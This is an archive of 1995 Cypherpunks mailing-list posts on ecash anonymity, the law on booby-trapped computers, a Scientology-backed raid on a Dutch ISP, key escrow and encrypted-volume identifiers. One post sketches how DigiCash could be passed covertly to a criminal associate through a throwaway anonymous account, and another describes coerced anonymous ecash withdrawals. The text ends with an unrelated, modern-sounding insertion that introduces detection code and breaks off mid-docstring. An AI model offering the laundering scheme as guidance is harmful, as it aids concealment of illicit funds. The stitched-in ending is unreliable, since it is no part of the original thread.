From: shamrock at netcom.com (Lucky Green)

> So it is harder to compile dossiers on people. Big deal.
> The recipient can still determine who gets the goods paid for by the "anonymous" ecash by conventional means (hint: shipping address), so the payee anonymity is of little value as far as protecting the privacy of the payer (most likely the recipient of the goods) is concerned.

This would be true for physical goods in any payment system, no matter how anonymous, unless physical remailers are used (and they have their limitations). However software (including music, video, etc.) would be easier to deliver anonymously. It is generally agreed that more of our economy is moving towards information exchanges and so ecash-like systems can play an increasingly larger part in protecting privacy. To me, this is indeed a big deal.

Even for physical goods, the use of ecash is better than credit cards because the information about purchases is distributed rather than centralized. Every time I look at my credit card bill I feel dismayed at what the company is finding out about my family.

Ecash could also be used as a cash replacement in smartcards. Consider as an alternative a fully traceable payment system, where you use your debit card at the supermarket, the bus station, the snack bar, the drug store. I suspect that if we don't get something like ecash then this system will be the alternative. It opens up possibilities for dossiers that will fulfill Big Brother's dreams. Virtually every move of every citizen will be recorded in just a few centralized places. IMO the protection of payor privacy that even Chaum's limited ecash provides is very important.

> Ecash of course is of *no* value for the various assassination markets, drug dealing, money laundering, etc. that routinely get mentioned in the same paragraph as Ecash. The reason is the *full traceability* of the payee that has been deliberately built into the current version of Ecash.
> A "feature" that you may rest assured will be part of all future versions backed by anyone with even marginal reputation in the financial markets.

Well, I have never fully accepted the notion that crypto was going to usher in an age of anarchy. As long as we deal with physical goods in the physical world it seems to me that anonymity will be difficult. On the net it is easier but man does not live by bits alone. For me, protecting privacy is a difficult enough problem. Transforming the world into a libertarian/anarchist utopia is somebody else's job.

Hal

P.S. Without seeing the technical specs it is hard to describe in detail, but generally Chaumian ecash allows fully anonymous coerced transfers. The payee/coercer supplies the blinded coins and forces the payor to use them to make withdrawals from his account. The resulting signed tokens are passed to the coercer who unblinds them and now has fully anonymous, untraceable cash tokens which he can spend.

From wilcoxb at nagina.cs.colorado.edu Tue Sep 5 21:42:46 1995
From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox)
Date: Tue, 5 Sep 95 21:42:46 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To:
Message-ID: <199509060442.WAA08575@nagina.cs.colorado.edu>

I, Bryce Wilcox wrote:

> I hope I'm not missing anything here.

shamrock at netcom.com (Lucky Green) wrote:

> Only that Ecash has no benefits for transactions that are of an illegal nature. The meaning of "illegal" is of course increasing as new laws are passed every session of the legislature.

Chaum says that (especially when speaking before U.S. Congress) but I think he is playing both sides of the fence. He is a die-hard privacy advocate who allegedly turns down lucrative business deals because he feels they would dilute his privacy achievements.
The truth is that Chaumian DigiCash is a *lot* safer for criminals than, say, credit cards, and when it is combined with the other tools in a money launderer's toolbox, I expect it will be a great boon to them.

Suppose you have acquired a million dollars worth of legal, above-board DigiCash dollars and you want to surreptitiously transfer this wealth to a below-board friend. Your friend creates a temporary anonymous account at an understanding bank. You just use a lot of small denominations to squirt the dollars to your friend's account. Then he squirts them to his real accounts and destroys the blinding factors that the temporary anon account used. Now without active physical surveillance, nobody other than yourself and your friend will ever know where the money went, and you can't prove that you gave it to him, either...

I hope no bloodthirsty mob bosses or statist legislators are reading this...

Bryce

signatures follow:

+ public key on keyservers /. island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---*

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBME0mG/WZSllhfG25AQES6AP9H6wluOOoUKpN92hiVSrwrig4dKoRbPJt
d7ROsrQUyx5OXBZXRxyrQvY3z/Qd4ytHXpoKAfpizGwAClqFubZ/OcRxTyiAudgG
0mA+dd9nHYPswAyVFmLk9rqkv3AIO3Ikq8uunh4KkUx72rmZf62G8+N4nkR7TKZP
/E+1PDmuPzI=
=wvSK
-----END PGP SIGNATURE-----

From an253398 at anon.penet.fi Tue Sep 5 22:07:21 1995
From: an253398 at anon.penet.fi (Mole Rat)
Date: Tue, 5 Sep 95 22:07:21 PDT
Subject: Scientology and police visit XS4ALL Amsterdam
Message-ID: <9509060434.AA09596@anon.penet.fi>

announce at xs4all.nl writes:

[ snip ]

> Police and members of Scientology church enter offices of XS4ALL
> ================================================================
>
> Amsterdam - Tuesday, September 5, 1995.
>
> Today at about 14:00, XS4ALL was visited by Mr. S. Braan, bailiff.
> He was acting on behalf of the Religious Technology Centre, better known as the Scientology Church, or Scientology for short. He was assisted by a local police officer and Mr. Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology in The Netherlands. Also present were two computer experts (Mr. Ootjes and Mr. Van Suchtelen), a locksmith (to enter had we not been present) and two American employees of Scientology, Mr. Weightman and Ms. Jenssen.

[ snip ]

This is the second or third time I've seen descriptions of such raids where cult (no, I'm not trying to be diplomatic) representatives were present and participating. Is this legal in Amsterdam? How about in the U.S.? Britain?

If a police officer has a warrant then I really don't have much choice about letting him in. Am I also under an obligation to allow the people who filed for the warrant into my home or business?

Thanks,
Mole Rat

----------------------------------------------------------------------------
To find out more about the anon service, send mail to help at anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin at anon.penet.fi.

From sandfort at crl.com Tue Sep 5 22:34:46 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Tue, 5 Sep 95 22:34:46 PDT
Subject: Are booby-trapped computers legal?
In-Reply-To: <199509060419.XAA04296@einstein.ssz.com>
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 5 Sep 1995, Jim Choate wrote:

> . . . federal ruling that basically says that if you meet a burglar in your home at night you can not kill or otherwise harm them unless your life is directly threatened. In short, you MUST give up the ground if at all possible. . . .

Citation please.
Killing is usually a state matter. I doubt there was any such federal ruling.

In California, there is a legal presumption that anyone who illegally enters an occupied dwelling, at night, is a threat to life or great bodily harm. You may, therefore, use deadly force without further evidence. (This means you can shoot 'em in the back if you want.)

Now back to the booby-trapped computer thread: I think it would be better to have your booby-trap kill your data, not the nice men in the nomex ski masks. While those folks might take a dim view of the former, they most certainly would take extreme umbrage at the latter.

S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From shamrock at netcom.com Tue Sep 5 22:57:11 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 22:57:11 PDT
Subject: Non-Delivery Notification
Message-ID:

What is this shit? Got about ten today.

--- begin forwarded text

From: sysop at dkmail.dkeep.com
To: shamrock at netcom.com
Subject: Non-Delivery Notification
Organization: Dragon Keep (904) 375-3500
Date: Wed, 06 Sep 95 00:05:41 EST

NON-DELIVERY NOTICE
-------------------

The message you sent on: Unknown to -unknown was undeliverable.

========================= !!! Automated Notice !!! =======================
E-mail replies to this user should have the following on the first line of message text:
TO: -unknown
==========================================================================

--- end forwarded text

-- Lucky Green
PGP encrypted mail preferred.

From shamrock at netcom.com Tue Sep 5 22:57:13 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 22:57:13 PDT
Subject: Growth of actions definded as crime. Which math formula?
Message-ID:

At 23:56 9/5/95, Black Unicorn wrote:
rypted mail preferred.
>
> Really it's hard to answer this because what constitutes a "NEW" act is a real question in and of itself.
>
> For example, wire fraud. Is it a "NEW" crime?
> Or just a subset of fraud, or mail fraud?

If the guy would have gotten away before the new law was passed, it is a new crime. That's the stats I am looking for.

-- Lucky Green
PGP encrypted mail preferred.

From shamrock at netcom.com Tue Sep 5 22:57:17 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 22:57:17 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)
Message-ID:

At 22:42 9/5/95, Bryce Wilcox wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
>
> I, Bryce Wilcox wrote:
> > > I hope I'm not missing anything here.
>
> shamrock at netcom.com (Lucky Green) wrote:
> > Only that Ecash has no benefits for transactions that are of an illegal nature. The meaning of "illegal" is of course increasing as new laws are passed every session of the legislature.
>
> Chaum says that (especially when speaking before U.S. Congress) but I think he is playing both sides of the fence. He is a die-hard privacy advocate who allegedly turns down lucrative business deals because he feels they would dilute his privacy achievements. The truth is that Chaumian DigiCash is a *lot* safer for criminals than, say, credit cards, and when it is combined with the other tools in a money launderer's toolbox, I expect it will be a great boon to them.

Chaum is a privacy advocate when it comes to companies compiling dossiers on you. When it comes to criminal use, my conversations with Chaum, his public comments, and last but not least the current implementation of his software suggest otherwise.

> Suppose you have acquired a million dollars worth of legal, above-board DigiCash dollars and you want to surreptitiously transfer this wealth to a below-board friend. Your friend creates a temporary anonymous account at an understanding bank. Y

Won't work. Ecash, except as used for frequent flyer like points, will exist in only *one* world wide e$ currency, issued by a single entity composed of various major banks and subject to US laws.
Getting Ecash accounts will therefore be subject to the same legal requirements that apply to normal US checking accounts.

> Now without active physical surveillance, nobody other than yourself and your friend will ever know where the money went, and you can't prove that you gave it to him, either...

You or a sting operation can always reveal the recipient by publishing the blinding factor. Besides, your Ecash client keeps a log of the payees.

-- Lucky Green
PGP encrypted mail preferred.

From unicorn at access.digex.net Tue Sep 5 22:58:40 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Tue, 5 Sep 95 22:58:40 PDT
Subject: Are booby-trapped... [Detailed treatment]
In-Reply-To:
Message-ID:

>From tcmay at got.net Wed Sep 6 00:30:39 1995
Date: Tue, 5 Sep 1995 20:49:25 -0700
From: "Timothy C. May"
To: cypherpunks at toad.com
Subject: Are booby-trapped computers legal?

(I've changed the name of this thread.)

At 2:30 AM 9/6/95, Lucky Green wrote:
>>I am wondering about the legalities of booby trapped computer equipment. Would it be legal if a clear warning to the fact was posted on the hardware?

>There are two types of "booby traps" to consider:

>* Type 1 Booby Trap: a shotgun is placed inside a home, set to fire if and when a burglar enters. Or an electrified region of a room is set to "get energized" when an intruder enters. These are "surprises" and are canonical booby traps.

>These have been found to be illegal in several court cases. (I'm not a lawyer, but I've been reading about them for 20 years. Famous cases where a burglar sued, and won, because he was injured when breaking into a house.)

Katko v. Briney, 183 N.W.2d 657 (Iowa 1971).

The defendants owned an old, boarded-up house, located several miles from their home, in which they stored various old bottles, fruit jars and the like, which they considered to be antiques. Several times during the previous several years the windows in the house had been broken and the entire place "messed up."
The defendants first posted "no trespass" signs to keep off intruders, but the break-ins continued. Shortly before the injury to the plaintiff, the defendants placed a "shotgun trap" in one of the bedrooms. The gun was first positioned so as to hit an intruder in the stomach, but Mr. Briney, at his wife's insistence, lowered it to hit at the legs. He said that he set the gun "because I was mad and tired of being tormented," but insisted that "he did not intend to injure anyone."

The plaintiff was shot in the legs and permanently injured when he entered the defendant's bedroom shortly after the gun was set. He had been to the place several times before, and had intended upon this occasion to steal some of the defendant's possessions. The plaintiff pleaded guilty to a charge of larceny and paid a fine of $50. He also sued the defendant for personal injuries and was awarded $20,000 in actual damages and $10,000 in punitive damages.

[Jury instruction #6 was one of the items at issue in the appeal to the Iowa Supreme Court]

Instruction 6 stated:

"An owner of a premises is prohibited from willfully or intentionally injuring a trespasser by means of force that either takes life or inflicts great bodily injury and therefore a person owning a premise is prohibited from setting out "spring guns" and like dangerous devices which will likely take life or inflict great bodily injury, for the purpose of harming trespassers. The fact that the trespasser may be acting in violation of the law does not change the rule. The only time when such conduct of setting a "spring gun" or a like dangerous device is justified would be when the trespasser was committing a felony of violence or a felony punishable by death, or where the trespasser was endangering human life by his act."

[Upheld on appeal]

Note that the case caused a literal riot in Iowa. Checks poured in to the Brineys (the boobytrappers) from everywhere (by one account, even from prisons). They raised over $10,000 this way.
Briney was heard to comment: "They used booby traps in Viet Nam didn't they?" Asked if he would do it again: "There's one thing I'd do different, though, I'd have aimed that gun a few feet higher."

Reference is given to a front page story in the Chicago Trib. of April 25, 1975.

See also, Allison v. Fiscus, 156 Ohio St. 120, 100 N.E.2d 237 (1951). [Plaintiff could collect damages when he was injured by a booby trap consisting of two sticks of dynamite even though he was feloniously breaking into defendant's warehouse with intent to steal.]

Some states allow a criminal liability, even of homicide, to landowners installing booby traps.

The basic rule today in most states resembles the Restatement position:

Section 85. Use of Mechanical Device Threatening Death or Serious Bodily Injury.

The actor is so far privileged to use such a device intended or likely to cause serious bodily harm or death for the purpose of protecting his land or chattels from intrusion that he is not liable for the serious bodily harm or death thereby caused to an intruder whose intrusion is, in fact, such that the actor, were he present, would be privileged to prevent or terminate it by the intentional infliction of such harm.

Some states have deviated from Section 85, however, California included. People v. Caballos, 12 Cal. 470, 526 P.2d 241, 116 Cal. Rptr. 233 (1974).

"It seems clear that the use of such [mechanical] devices should not be encouraged. Moreover, whatever may be thought in torts, the [Restatement] rule setting forth an exception to liability for death or injuries inflicted by such devices 'is inappropriate in penal law for it is obvious that it does not prescribe a workable standard of conduct; liability depend on fortuitous results.'" (i.e. what the trespasser was doing in there in the first place)

What constitutes reasonable force is generally a question for the jury. Some exceptions exist.
When the invasion is peaceful, and in the presence of the possessor, the use of any force at all will be unreasonable unless a request has been made to depart. Chapell v. Schmidt, 38 P. 892 (1894) (Defendant caned elderly person who was picking flowers). A request need not be made however when conduct of the intruder would indicate to a reasonable person that it would be useless or that it could not safely be made in time. See Higgins v. Minagham, 47 N.W. 941 (1891).

>* Type 2 Booby Trap: electrified perimeter fences. So long as these are adequately marked ("If you touch this fence, you will probably die"), and are not public nuisances where children and pets will inadvertently validate Darwin's theory, these are--I think--legal. There may be license fees required, to build an electrified fence, but I think it is possible to build a lethal voltage electrified fence on one's property.

While clear notice of the danger of deadly force is a partial defense to criminal and civil liability in some states (Starkey v. Dameron, 21 P.2d 1112 (1933) [Colorado]; State v. Marfaudille, 92 P. 939 (1907) [Washington State]) and implicit or constructive notice in others (Quigley v. Clough, 53 N.E. 884 (1899) (Presence of barbed wire may constitute notice of deadly or injurious force)), some prohibit it outright, notice or not (State v. Plumlee, 149 So. 425 (1933) [La.]).

An obnoxiously exhaustive treatment of the entire subject can be found in Bohlen and Burns, The Privilege to Protect Property by Dangerous Barriers and Mechanical Devices, 35 Yale L.J. 535 (1926); or for a more interesting treatment (IMHO) Hart, Injuries to Trespassers, 47 Law Q.Rev. 92 (1931).

>Thus, I suspect it is fully legal to build an electrified fence around one's PC, providing suitable warnings are included.

Varies by state.
If your intent is to prevent ACCESS to the computer, as opposed to THEFT, I cannot see how electrocution could be considered "reasonable force" to prevent it, given the host of other methods to prevent access without harm to the trespasser.

>I would not call the second type a real booby trap, though some courts might, depending. A properly labelled electrified fence seems legal, on one's own property, but may not be.

I don't know that CRIMINAL liability will ensue in those states that exempt defenses with warnings, but certainly civil liability might. Never know what a jury will do.

>And certainly I think any explosive-rigged system is illegal, for explosives reasons if not for booby trap reasons.

Again, reasonable force will be a question for the jury. Explosives are a bit dramatic for a jury to swallow as "reasonable." Explosives charges will likely be in counts 4&5.

>I know of no case law on this, and suspect that if an FBI agent were to be electrocuted or blown up upon trying to open/use/disconnect the PC, even with clear warnings, that a prosecution would happen. Results are unclear (to me).

>(I think that if an FBI agent were to be electrocuted while climbing on a clearly labelled electrified fence, no prosecution would result.)

>Of course, if a PC were to be clearly labelled as being rigged, then steps could presumably be taken to defuse the arrangement.

Ominously, the possessor is responsible for determining the 'trespasser's' right to enter the property. In other words, if an officer with legal rights to enter the property was injured or killed by a booby trap (warnings or not) liability would almost without question ensue. The only defined defense available would be the officer's contributory negligence (ignoring the sign, etc.).

My guess is that FBI enters, sees the PC, calls bomb squad, a member of bomb squad is injured by explosive or electrocution or whatever, liability ensues, warning or not.
At this point warning is not an issue as the possessor would not have the right to repel legally entitled officers were he present and thus cannot repel them while absent.

I've completely ignored the use of other deadly force in home invasion cases. Mr. Sandfort was pretty close to right on there for Cali.

>--Tim May
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May | Crypto Anarchy: encryption, digital money,
>tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero

---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig!
*New Key Information* - Finger for key revocation and latest key update.

From chen at intuit.com Tue Sep 5 22:59:41 1995
From: chen at intuit.com (Mark Chen)
Date: Tue, 5 Sep 95 22:59:41 PDT
Subject: Crypto '95
In-Reply-To: <199509021859.OAA02093@bwh.harvard.edu>
Message-ID: <9509060553.AA08998@doom.intuit.com>

> The best talks were probably by Ross Anderson (Robustness Principles for Public Key Protocols) and Adi Shamir (Myths and Realities of Cryptography).

One interesting aspect of Anderson's result is that it decisively breaks X.509 (he shows how to forge signatures in encrypt-before-signing protocols by computing a discrete log over the RSA modulus). I strongly recommend the paper.

-- Mark Chen
chen at intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D

From unicorn at access.digex.net Tue Sep 5 23:01:11 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Tue, 5 Sep 95 23:01:11 PDT
Subject: Growth of actions definded as crime. Which math formula?
In-Reply-To:
Message-ID:

On Tue, 5 Sep 1995, Lucky Green wrote:

> Date: Tue, 5 Sep 1995 23:01:01 -0800
> From: Lucky Green
> To: Black Unicorn
> Cc: cypherpunks at toad.com
> Subject: Re: Growth of actions definded as crime. Which math formula?
>
> At 23:56 9/5/95, Black Unicorn wrote:
> rypted mail preferred.
> >
> >Really it's hard to answer this because what constitutes a "NEW" act is a real question in and of itself.
> >
> >For example, wire fraud. Is it a "NEW" crime? Or just a subset of fraud, or mail fraud?
>
> If the guy would have gotten away before the new law was passed, it is a new crime.

This is very rare. It's mostly in definitional cases, for example, where Ecstasy was just not defined as a controlled substance some years ago.

Created crimes are few and far between. There's a lot of jurisprudence. Criminals are creative, but there are only so many things that can't be covered by "Fraud."

> That's the stats I am looking for.
>
> -- Lucky Green
> PGP encrypted mail preferred.

---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig!
*New Key Information* - Finger for key revocation and latest key update.

From michaelb at primenet.com Tue Sep 5 23:01:57 1995
From: michaelb at primenet.com (Michael Bredimus)
Date: Tue, 5 Sep 95 23:01:57 PDT
Subject: Are booby-trapped computers legal?
Message-ID: <199509060601.XAA08779@mailhost.primenet.com>

At 09:43 PM 9/5/95 -0700, Timothy C. May wrote:
>>As far as I know the owner of property has no legal right to kill a person either trespassing or stealing it in any of the 50 states. There was a recent federal ruling that basically says that if you meet a burglar in your home at night you can not kill or otherwise harm them unless your life is directly threatened. In short, you MUST give up the ground if at all possible. Federal and all 50 states (as far as I have been able to determine) rule human life to have an inherently higher value than property of any type (this does not apply to government institutions).
>

The laws regarding the use of deadly force against an unarmed burglar in one's home vary from state to state.
In Massachusetts, for example, a homeowner has a DUTY to retreat from his own home before employing deadly force against an intruder. In Arizona, however, we prefer a much different approach.

13-411. Justification; use of force in crime prevention

A. A person is justified in threatening or using both physical force and deadly physical force against another if and to the extent the person reasonably believes that physical force or deadly physical force is immediately necessary to prevent the other's commission of ... burglary in the second or first degree under section 13-1507 ...

13-1507. Burglary in the second degree; classification

A. A person commits burglary in the second degree by entering or remaining unlawfully in or on a residential structure with the intent to commit any theft or any felony therein.

michaelb at primenet.com

From shamrock at netcom.com Tue Sep 5 23:15:31 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 23:15:31 PDT
Subject: Growth of actions definded as crime. Which math formula?
Message-ID:

At 2:00 9/6/95, Black Unicorn wrote:
>> If the guy would have gotten away before the new law was passed, it is a new crime.
>
>This is very rare. It's mostly in definitional cases, for example, where Ecstasy was just not defined as a controlled substance some years ago.
>
>Created crimes are few and far between.

Excuse my ignorance, but it just begs the question. Why then all the new laws? Just to twist the penalty screw another turn?

Confused,
-- Lucky Green
PGP encrypted mail preferred.

From shamrock at netcom.com Tue Sep 5 23:40:44 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 23:40:44 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)
Message-ID: <199509060638.CAA15606@book.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <199509060432.VAA05003 at jobe.shell.portal.com>, hfinney at shell.portal.com (Hal) wrote:
>P.S.
>Without seeing the technical specs it is hard to describe in detail, but generally Chaumian ecash allows fully anonymous coerced transfers. The payee/coercer supplies the blinded coins and forces the payor to use them to make withdrawals from his account. The resulting signed tokens are passed to the coercer who unblinds them and now has fully anonymous, untraceable cash tokens which he can spend.

Assuming it can be done (I am checking), he would also have a large balance on his non-anonymous Ecash account that he would have a very hard time explaining to the IRS, FINsomething [sorry, forgot the name], and other interested and certainly to be involved parties.

Cyberspace is much closer connected to the real world than many people on this list, myself included, would like to think it is.

- --
- -- Lucky Green
PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBME1B1SoZzwIn1bdtAQF7FwGAgqmPsLaol1LbR2zb+FI7nmYDlp7BY91G
SsT6iJukYmiKzcmG4YNPtGJ8QCrUGkZo
=CNiP
-----END PGP SIGNATURE-----

From shamrock at netcom.com Tue Sep 5 23:43:14 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 23:43:14 PDT
Subject: Scientology and police visit XS4ALL Amsterdam
Message-ID: <199509060640.CAA15617@book.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <9509060434.AA09596 at anon.penet.fi>, an253398 at anon.penet.fi (Mole Rat) wrote:
> This is the second or third time I've seen descriptions of such raids where cult (no, I'm not trying to be diplomatic) representatives were present and participating. Is this legal in Amsterdam? How about in the U.S.? Britain?
>
> If a police officer has a warrant then I really don't have much choice about letting him in.
> Am I also under an obligation to allow the people who filed for the warrant into my home or business?

I doubt it. Get a good attorney.

- --
- -- Lucky Green
PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBME1CaSoZzwIn1bdtAQGGyAF7BojcAMnxvfMcyJSWLHlJe0d0QezwdVGZ
paDopX2LMcxjuUgupNXgF1GwRPbvx2dl
=Dstl
-----END PGP SIGNATURE-----

From carolann at censored.org Tue Sep 5 23:58:27 1995
From: carolann at censored.org (Carol Anne Braddock)
Date: Tue, 5 Sep 95 23:58:27 PDT
Subject: Scientology and police visit XS4ALL Amsterdam
Message-ID: <199509060658.XAA28913@mailhost.primenet.com>

Anon.penet.fi succinctly scribed:
> If a police officer has a warrant then I really don't have much choice about letting him in. Am I also under an obligation to allow the people who filed for the warrant into my home or business?

They aren't, but they do, and only a good civil rights lawyer can help you out of the resulting quagmire. It's done in a lot of civil cases, particularly where restraining orders are used.
Love Always,
Carol Anne

--
Member Internet Society - Certified BETSI Programmer - Webmistress
***********************************************************************
Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96
My Homepage The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&
http://dcs.ex.ac.uk/~aba/export/

From an5877 at anon.penet.fi Wed Sep 6 00:12:45 1995
From: an5877 at anon.penet.fi (deadbeat)
Date: Wed, 6 Sep 95 00:12:45 PDT
Subject: SSLRef (SSLtelnet)
Message-ID: <9509060647.AA14769@anon.penet.fi>

-----BEGIN PGP SIGNED MESSAGE-----

> Verisign is a spin off of RSA.

Verisign, Inc. (VERISIGN-DOM)
100 Marine Parkway, Suite 525
Redwood City, CA 94065

Domain Name: VERISIGN.COM

Administrative Contact, Technical Contact, Zone Contact:
Taylor, Simon (ST192) simon at RSA.COM
(415) 508-1151

Record last updated on 21-Jun-95.

DEADBEAT

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBFAgUBME0AO/FZTpBW/B35AQFdLAGAiV1RqNmLh5W+uuHeKsXX/819qK5WTq3Y
TobFKWLxkTjkEwDs6Js7UB2PFRnt6gDk
=HEHU
-----END PGP SIGNATURE-----

From Davidwfox at eworld.com Wed Sep 6 00:59:22 1995
From: Davidwfox at eworld.com (Davidwfox at eworld.com)
Date: Wed, 6 Sep 95 00:59:22 PDT
Subject: e$: More fun with cash: Senate Bill 307
Message-ID: <950906005854_14454028@eWorld.com>

----------------------------- Begin Original Text -----------------------------
Has anyone heard about this bill? Comments?
Cheers,
Bob Hettinga
----------------------------- End Original Text -----------------------------

There was an investigative article in a recent Readers Digest (no I'm not a regular reader, heard it through Radio for the Print Handicapped in Australia) regarding a major counterfeiting operation that uses the same printing presses as used by US Treasury. The proceeds amount to BIG numbers and are used to fund various terrorist organizations.

regards
David Fox
The e-commerce directory
www.kweb.com

From eric at remailer.net Wed Sep 6 01:28:08 1995
From: eric at remailer.net (Eric Hughes)
Date: Wed, 6 Sep 95 01:28:08 PDT
Subject: ANNOUNCE: September 1995 SF Bay Area physical meeting
Message-ID: <199509060824.BAA02026@largo.remailer.net>

ANNOUNCEMENT
============

What: September 1995 SF Bay Area physical meeting
When: Saturday, 9 September 1995, 12:00 noon - 6:00 p.m.
Where: that hard-to-find loft space at 2nd & Brannan where we had July's meeting

This month's meeting is the "Even More Catastrophically Overnamed Fourth Annual Cypherpunks Conclave, Congress, Schmooze-Fest, Meeting, and Feast". It's been three years since the first meeting at my house at the time in Oakland. If you only come to one meeting a year, come to this one. It's canonical.

The agenda for this meeting is completely empty. I've been out of town for all but a total of about three weeks since the last meeting two months ago (and I'm gone the rest of this week and flying in Saturday morning). So where in the past we've had something approaching a schedule, this time I've not made even a pretense at scheduling. So just show up -- we always find something good to talk about.

And besides, if you don't show up, you can't hear about my unexpected genetic discovery!

Directions follow. See you there.

Eric

-----------------------------------------------------------------------------
Exact Location: 340 Bryant St., 4th floor (top level); SF.
Directions:

1) From the East Bay--Cross the Bay Bridge and take the LEFT exit for Main St./Embarcadero. You will be making a series of LEFT turns as follows: LEFT on Harrison, LEFT on 2nd, LEFT on Bryant. PARK! There is parking around the back of the building, and also across the street.

2) From the Peninsula--101 North, take the 4th Street exit. (The last SF Exit before the Bay Bridge. GET OFF HERE!) Follow to the RIGHT onto Bryant. Once you've crossed Second St., PARK!

3) If you get LOST: Call 415/284-0252.

From asb at nexor.co.uk Wed Sep 6 01:46:03 1995
From: asb at nexor.co.uk (Andy Brown)
Date: Wed, 6 Sep 95 01:46:03 PDT
Subject: Equinox/cypherpunks/www
Message-ID:

Anyone that missed or was unable to get the UK TV programme Equinox might like to take a look at:

http://www.cityscape.co.uk/channel4/big_bytes/cybersecrecy/cyber000.html

- Andy

From rrothenb at ic.sunysb.edu Wed Sep 6 01:57:46 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Wed, 6 Sep 95 01:57:46 PDT
Subject: Another Son of Clipper discussion paper
In-Reply-To: <199509052053.NAA01226@mycroft.rand.org>
Message-ID: <199509060858.EAA15990@libws4.ic.sunysb.edu>

> Key Escrow Issues Meeting, September 6-7, 1995
> Discussion Paper #3
>
> Export Criteria Discussion Draft --
> 64-bit Software Key Escrow Encryption

Pardon my obvious question, but if there's some sort of GAK/LEAF, then why limit it to 64-bit? It seems possible that the assumption is 'just in case the GAK is tampered with' there's still a chance of cracking it, should the need arise.

[..]

I'm wondering just how securely a hack-proof escrow system can be written. It seems that someone can always go in with a sophisticated debugger and do some tampering of the software.

And one need not mention the what-if-foreign-competitors-do-not-implement-this-scheme? question...
From rrothenb at ic.sunysb.edu Wed Sep 6 02:14:01 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Wed, 6 Sep 95 02:14:01 PDT
Subject: Secure Device 1.4 Question
In-Reply-To: <199509060025.CAA05098@utopia.hacktic.nl>
Message-ID: <199509060915.FAA16064@libws4.ic.sunysb.edu>

> I just installed Secure Device, v1.4 on a PC at work. After
> installing it, I looked at the encrypted volume and found the string
> "SECDEV " starting at the fourth byte of the file. I'd prefer that
> this file look like some temporary file that got left on the disk by
> a program that didn't clean up properly after itself, and not be
> identifiable as an encrypted volume.

Problems with that:

1. SecDev needs a way to easily ID its own files. Encrypting a known ID string would be a weakness (known plaintext), so it's better to have a plaintext identifier.

2. If someone thinks it's a lost TMP file they will delete it. Not a risk you want. It's better if they think it's a strange type of swap file or something needed by an application.

[..]

Source is available... so you can change the ID string in source to something innocuous yet unique and recompile it.

> As you've probably guessed, I'm not supposed to have any personal
> files on my work computer, and an entire encrypted volume would
> undoubtedly make someone go ballistic if they discovered it. When I
> want to use my encrypted file system, I reboot off of a floppy, and
> all Secure Device programs and drivers are kept on the floppy. The
> only thing that has to be left on the hard drive is the encrypted
> volume itself.

Well, there's a risk of someone seeing a mysterious file and deleting it anyway... assuming they don't go ballistic over it anyhow. There's also a risk of someone peering over your shoulder and noticing that something's afoot as well, is there not?
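The two points made in the reply above (a plaintext identifier is trivially spotted, and a file that is nothing but ciphertext does not look like a leftover temp file either) can be checked with a small detector. This is an added example, not code from Secure Device or from either poster. It assumes only what the thread states, that the volume carries "SECDEV " starting at the fourth byte; the three sample files it scans are constructed here, with a seeded random byte string standing in for ciphertext, and the 7.5 bits-per-byte threshold is an assumption, not a Secure Device constant.

```python
"""Detect an encrypted volume file by its plaintext marker, then by entropy.

Added example, not part of Secure Device or the original post. The only fact
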